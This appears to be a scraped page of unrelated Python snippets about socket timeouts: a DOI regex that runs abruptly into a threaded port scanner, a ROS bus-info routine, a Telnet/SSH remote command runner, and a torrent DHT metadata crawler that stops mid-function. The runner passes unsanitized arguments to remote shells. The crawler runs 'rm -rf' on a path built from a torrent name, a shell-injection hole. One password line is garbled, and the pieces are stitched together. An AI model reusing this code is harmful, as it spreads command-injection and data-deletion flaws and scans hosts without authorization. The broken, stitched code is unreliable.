# DOI is in the URL - this is what we need to get citation information
URL_DOI_REGEXP = '(10[.]\d+/[^/?&]+)'
URL_DOI_REGEXP_FLAGS = re.IGNORECASE | re.VERBOSE

# error messages
ERR_STR_PREFIX = 'status\terr\t'
ERR_STR_FETCH = 'Unable to fetch the bibliographic data: '
ERR_STR_TRY_AGAIN = 'The server may be down.  Please try later.'
ERR_STR_NO_DOI = 'Could not extract DOI from the URL: '
import socket
import time
import threading

import Queue

socket.setdefaulttimeout(0.25)
print_lock = threading.Lock()

target = raw_input('Enter the host to be scanned: ')
t_IP = socket.gethostbyname(target)
print('Starting scan on host: ', t_IP)


def portscan(port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        con = s.connect((t_IP, port))
        with print_lock:
            print(port, 'is open')
        con.close()
    except Exception as e:
        pass


def threader():
    while True:
        worker = q.get()
        portscan(worker)
        q.task_done()
Exemple #58
0
    def _node_refresh_businfo(self, node, api, bad_node=False):
        """
        Retrieve bus info from the node and update nodes and edges as appropriate
        @param node: node name
        @type  node: str
        @param api: XML-RPC proxy
        @type  api: ServerProxy
        @param bad_node: If True, node has connectivity issues and
        should be treated differently
        @type  bad_node: bool
        """
        try:
            logger.debug("businfo: contacting node [%s] for bus info", node)
            
            # unmark bad node, though it stays on the bad list
            if bad_node:
                self._unmark_bad_node(node)            
            # Lower the socket timeout as we cannot abide by slow HTTP timeouts.
            # If a node cannot meet this timeout, it goes on the bad list
            # TODO: override transport instead.
            old_timeout = socket.getdefaulttimeout()
            if bad_node:
                #even stricter timeout for bad_nodes right now
                socket.setdefaulttimeout(0.2)
            else:
                socket.setdefaulttimeout(1.0)
                
            code, msg, bus_info = api.getBusInfo(_ROS_NAME)
            
            socket.setdefaulttimeout(old_timeout)
        except Exception as e:
            # node is (still) bad
            self._mark_bad_node(node, str(e))
            code = -1
            msg = traceback.format_exc()

        updated = False
        if code != 1:
            logger.error("cannot get stats info from node [%s]: %s", node, msg)
        else:
            # [[connectionId1, destinationId1, direction1, transport1, ...]... ]
            for info in bus_info:
                # #3579 bad node, ignore
                if len(info) < 5:
                    continue
                
                connection_id = info[0]
                dest_id       = info[1]
                direction     = info[2]
                transport     = info[3]
                topic         = info[4]
                if len(info) > 5:
                    connected = info[5]
                else:
                    connected = True #backwards compatibility

                if connected and topic.startswith(self.topic_ns):
                    # blindly add as we will be able to catch state change via edges.
                    # this currently means we don't cleanup topics
                    self.nt_nodes.add(topic_node(topic))

                    # update node->topic->node graph edges
                    updated = self.nt_edges.add_edges(node, topic_node(topic), direction) or updated

                    # update node->node graph edges
                    if dest_id.startswith('http://'):
                        #print("FOUND URI", dest_id)
                        dest_name = self.uri_node_map.get(dest_id, None)
                        updated = self.nn_edges.add_edges(node, dest_name, direction, topic) or updated
                else:
                    #TODO: anyting to do here?
                    pass
        return updated
Exemple #59
0
 def __issuecommand(self, host, port, typ, pwd, command, arg):
     socket.setdefaulttimeout(30)
     if "%ARG%" in command:
         if self.__is_ipv4(arg) or self.__is_ipv6(arg):  # Not IPv4 or IPv6
             command = command.replace("%ARG%", arg)
         elif len(socket.getaddrinfo(arg, None)) > 0 and not self.resolve:
             # Resolve by switch/router
             command = command.replace("%ARG%", arg)
         elif self.resolve:  # Hostname support
             try:
                 arg = random.choice(socket.getaddrinfo(arg, None))[4][0]
                 command = command.replace("%ARG%", arg)
             except:
                 traceback.print_exc()
                 raise ValueError
         else:
             raise AttributeError
     if typ == TELNET:
         try:
             tn = telnetlib.Telnet(host, port, timeout=30)
             if pwd:
                 tn.read_until("Password: "******"\r\n")
             p = ""
             timer = 50  # 5 seconds read timeout
             while timer:
                 if tn.sock_avail():
                     p += tn.read_some()
                     timer += 1
                 else:
                     timer -= 1
                     sleep(0.1)
             prompt = p.splitlines()[-1]  # Last line with prompt
             tn.write(str(command) + "\r\n")  # Sanitize arguments!?
             read_data = tn.read_until(prompt, 10)
             read_data = read_data.splitlines()
             for line in read_data[:]:
                 if prompt in line:
                     read_data.remove(line)
             tn.write("exit\r\n")
             tn.close()
         except socket.timeout:
             read_data = ['Connection Timeout, please try again later']
     elif typ == SSH:
         ssh = paramiko.SSHClient()
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
         ssh.connect(
             host, port, username=pwd.split(':')[0], password=pwd.split(':')[1])
         stdin, stdout, stderr = ssh.exec_command(
             str(command))  # sanitize arguments!!??
         read_data = stdout.read().splitlines()
         ssh.close()
     pre_return = []
     indexes = [0, len(read_data)]
     for line in read_data:
         if command in line:
             indexes[0] = read_data.index(line) + 1
         elif 'exit' in line:
             indexes[1] = read_data.index(line)
     pre_return = read_data[indexes[0]: indexes[1]]
     return str(os.linesep.join(pre_return)).strip()
Exemple #60
0
class Master(Thread):
    def __init__(self):
        Thread.__init__(self)
        self.setDaemon(True)
        self.queue = Queue(maxsize=1000000)
        self.metadata_queue = Queue(maxsize=1000000)
        self.pool = PooledDB(pymysql,
                             50,
                             host=DB_HOST,
                             user=DB_USER,
                             passwd=DB_PASS,
                             db=DB_NAME,
                             port=3306,
                             charset="utf8mb4")  #50为连接池里的最少连接数
        self.dbconn = self.pool.connection()
        self.dbcurr = self.dbconn.cursor()
        self.dbcurr.execute('SET NAMES utf8mb4')
        #self.dbconn = mdb.connect(DB_HOST, DB_USER, DB_PASS, DB_NAME, charset='utf8')
        #self.dbconn.autocommit(False)
        #self.dbcurr = self.dbconn.cursor()
        #self.dbcurr.execute('SET NAMES utf8')
        self.n_reqs = self.n_valid = self.n_new = 0
        self.n_downloading_lt = self.n_downloading_pt = 0
        self.visited = set()

    def got_torrent(self):
        utcnow = datetime.datetime.utcnow()
        binhash, address, data, dtype, start_time = self.metadata_queue.get()
        if dtype == 'pt':
            self.n_downloading_pt -= 1
        elif dtype == 'lt':
            self.n_downloading_lt -= 1
        if not data:
            return
        self.n_valid += 1

        try:
            info = self.parse_torrent(data)
            if not info:
                return
        except:
            traceback.print_exc()
            return
        info_hash = binhash.encode('hex')
        info['info_hash'] = info_hash

        info['tagged'] = False
        info['classified'] = False
        info['requests'] = 1
        info['last_seen'] = utcnow + datetime.timedelta(hours=8)
        info['source_ip'] = address[0]

        if info.get('files'):
            files = [z for z in info['files'] if not z['path'].startswith('_')]
            if not files:
                files = info['files']
        else:
            files = [{'path': info['name'], 'length': info['length']}]

        files.sort(key=lambda z: z['length'], reverse=True)
        bigfname = files[0]['path']
        info['extension'] = get_extension(bigfname).lower()
        info['category'] = get_category(info['extension'])

        if 'files' in info:
            try:
                self.dbcurr.execute(
                    'INSERT IGNORE INTO search_filelist VALUES(%s, %s)',
                    (info['info_hash'], json.dumps(files)))
            except:
                print self.name, 'insert search_filelist error', sys.exc_info(
                )[1]
            del files

        try:
            #print '\n', 'Saved', info['info_hash'], info['name'], (time.time()-start_time), 's', address[0], geoip.country_name_by_addr(address[0]),
            self.dbcurr.execute(
                'INSERT IGNORE INTO search_hash(info_hash,category,data_hash,name,extension,classified,source_ip,tagged,length,create_time,last_seen,requests,comment,creator) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',
                (info['info_hash'], info['category'], info['data_hash'],
                 info['name'], info['extension'], info['classified'],
                 info['source_ip'], info['tagged'], info['length'],
                 info['create_time'], info['last_seen'], info['requests'],
                 info.get('comment', ''), info.get('creator', '')))
            self.dbcurr.connection.commit()
            self.n_new += 1
            print '\n', (datetime.datetime.utcnow() + datetime.timedelta(
                hours=8)).strftime("%Y-%m-%d %H:%M:%S"
                                   ), info['info_hash'], address[0], 'saved!'
        except:
            print self.name, 'save search_hash error', info
            traceback.print_exc()
            return

    def run(self):
        self.name = threading.currentThread().getName()
        print self.name, 'started'
        while True:
            while self.metadata_queue.qsize() > 0:
                self.got_torrent()
            address, binhash, dtype = self.queue.get()
            if binhash in self.visited:
                continue
            if len(self.visited) > 100000:
                self.visited = set()
            self.visited.add(binhash)

            self.n_reqs += 1
            info_hash = binhash.encode('hex')

            utcnow = datetime.datetime.utcnow()
            date = (utcnow + datetime.timedelta(hours=8))
            date = datetime.datetime(date.year, date.month, date.day,
                                     date.hour, date.minute, date.second)

            # 检查infohash是否存在
            self.dbcurr.execute(
                'SELECT id FROM search_hash WHERE info_hash=%s', (info_hash, ))
            y = self.dbcurr.fetchone()
            if y:
                self.n_valid += 1
                # 更新最近发现时间、请求数
                self.dbcurr.execute(
                    'UPDATE search_hash SET last_seen=%s, requests=requests+1 WHERE info_hash=%s',
                    (date, info_hash))
            else:
                if dtype == 'pt':
                    t = threading.Thread(target=self.download_metadata,
                                         args=(address, binhash,
                                               self.metadata_queue))
                    t.setDaemon(True)
                    t.start()
                    self.n_downloading_pt += 1
                elif dtype == 'lt':
                    t = threading.Thread(target=self.ltdownload_metadata,
                                         args=(address, binhash,
                                               self.metadata_queue))
                    t.setDaemon(True)
                    t.start()
                    self.n_downloading_lt += 1

            if self.n_reqs >= 1000:
                self.dbcurr.execute(
                    'INSERT INTO search_statusreport(date,new_hashes,total_requests, valid_requests)  VALUES(%s,%s,%s,%s) ON DUPLICATE KEY UPDATE '
                    +
                    'total_requests=total_requests+%s, valid_requests=valid_requests+%s, new_hashes=new_hashes+%s',
                    (date, self.n_new, self.n_reqs, self.n_valid, self.n_reqs,
                     self.n_valid, self.n_new))
                self.dbconn.commit()
                #print '\n', time.ctime(), 'n_reqs', self.n_reqs, 'n_valid', self.n_valid, 'n_new', self.n_new, 'n_queue', self.queue.qsize(),
                #print 'n_d_pt', self.n_downloading_pt, 'n_d_lt', self.n_downloading_lt,
                self.n_reqs = self.n_valid = self.n_new = 0

    def decode(self, s):
        if type(s) is list:
            s = ';'.join(s)
        u = s
        for x in (self.encoding, 'utf8', 'gbk', 'big5'):
            try:
                u = s.decode(x)
                return u
            except:
                pass
        return s.decode(self.encoding, 'ignore')

    def decode_utf8(self, d, i):
        if i + '.utf-8' in d:
            return d[i + '.utf-8'].decode('utf8')
        return self.decode(d[i])

    def parse_torrent(self, data):
        info = {}
        self.encoding = 'utf8'
        try:
            torrent = bdecode(data)
            if not torrent.get('name'):
                return None
        except:
            return None
        try:
            info['create_time'] = datetime.datetime.fromtimestamp(
                float(torrent['creation date'])) + datetime.timedelta(hours=8)
        except:
            info['create_time'] = datetime.datetime.utcnow(
            ) + datetime.timedelta(hours=8)

        if torrent.get('encoding'):
            self.encoding = torrent['encoding']
        if torrent.get('announce'):
            info['announce'] = self.decode_utf8(torrent, 'announce')
        if torrent.get('comment'):
            info['comment'] = self.decode_utf8(torrent, 'comment')[:200]
        if torrent.get('publisher-url'):
            info['publisher-url'] = self.decode_utf8(torrent, 'publisher-url')
        if torrent.get('publisher'):
            info['publisher'] = self.decode_utf8(torrent, 'publisher')
        if torrent.get('created by'):
            info['creator'] = self.decode_utf8(torrent, 'created by')[:15]

        if 'info' in torrent:
            detail = torrent['info']
        else:
            detail = torrent
        info['name'] = self.decode_utf8(detail, 'name')
        if 'files' in detail:
            info['files'] = []
            for x in detail['files']:
                if 'path.utf-8' in x:
                    v = {
                        'path': self.decode('/'.join(x['path.utf-8'])),
                        'length': x['length']
                    }
                else:
                    v = {
                        'path': self.decode('/'.join(x['path'])),
                        'length': x['length']
                    }
                if 'filehash' in x:
                    v['filehash'] = x['filehash'].encode('hex')
                info['files'].append(v)
            info['length'] = sum([x['length'] for x in info['files']])
        else:
            info['length'] = detail['length']
        info['data_hash'] = hashlib.md5(detail['pieces']).hexdigest()
        if 'profiles' in detail:
            info['profiles'] = detail['profiles']
        return info

    threading.stack_size(200 * 1024)
    socket.setdefaulttimeout(30)

    def log_announce(self, binhash, address=None):
        self.queue.put([address, binhash, 'pt'])

    def log_hash(self, binhash, address=None):
        if not lt:
            return
        if self.n_downloading_lt:
            self.queue.put([address, binhash, 'lt'])

    def fetch_torrent(session, ih, timeout):
        name = ih.upper()
        url = 'magnet:?xt=urn:btih:%s' % (name, )
        data = ''
        params = {
            'save_path': '/tmp/downloads/',
            'storage_mode': lt.storage_mode_t(2),
            'paused': False,
            'auto_managed': False,
            'duplicate_is_error': True
        }
        try:
            handle = lt.add_magnet_uri(session, url, params)
        except:
            return None
        status = session.status()
        #print 'downloading metadata:', url
        handle.set_sequential_download(1)
        meta = None
        down_time = time.time()
        down_path = None
        for i in xrange(0, timeout):
            if handle.has_metadata():
                info = handle.get_torrent_info()
                down_path = '/tmp/downloads/%s' % info.name()
                #print 'status', 'p', status.num_peers, 'g', status.dht_global_nodes, 'ts', status.dht_torrents, 'u', status.total_upload, 'd', status.total_download
                meta = info.metadata()
                break
            time.sleep(1)
        if down_path and os.path.exists(down_path):
            os.system('rm -rf "%s"' % down_path)
        session.remove_torrent(handle)
        return meta

    def ltdownload_metadata(address, binhash, metadata_queue, timeout=40):
        metadata = None
        start_time = time.time()
        try:
            session = lt.session()
            r = random.randrange(10000, 50000)
            session.listen_on(r, r + 10)
            session.add_dht_router('router.bittorrent.com', 6881)
            session.add_dht_router('router.utorrent.com', 6881)
            session.add_dht_router('dht.transmission.com', 6881)
            session.add_dht_router('127.0.0.1', 6881)
            session.start_dht()
            metadata = fetch_torrent(session, binhash.encode('hex'), timeout)
            session = None
        except:
            traceback.print_exc()
        finally:
            metadata_queue.put((binhash, address, metadata, 'lt', start_time))

    def download_metadata(self, address, infohash, metadata_queue, timeout=5):
        metadata = None
        start_time = time()
        try:
            the_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            the_socket.settimeout(timeout)
            the_socket.connect(address)

            # handshake
            send_handshake(the_socket, infohash)
            packet = the_socket.recv(4096)

            # handshake error
            if not check_handshake(packet, infohash):
                return

            # ext handshake
            send_ext_handshake(the_socket)
            packet = the_socket.recv(4096)

            # get ut_metadata and metadata_size
            ut_metadata, metadata_size = get_ut_metadata(
                packet), get_metadata_size(packet)
            #print 'ut_metadata_size: ', metadata_size

            # request each piece of metadata
            metadata = []
            for piece in range(int(math.ceil(metadata_size / (16.0 * 1024)))):
                request_metadata(the_socket, ut_metadata, piece)
                packet = recvall(the_socket,
                                 timeout)  #the_socket.recv(1024*17) #
                metadata.append(packet[packet.index("ee") + 2:])

            metadata = "".join(metadata)
            #print 'Fetched', bdecode(metadata)["name"], "size: ", len(metadata)

        except socket.timeout:
            pass
        except Exception, e:
            pass  #print e

        finally: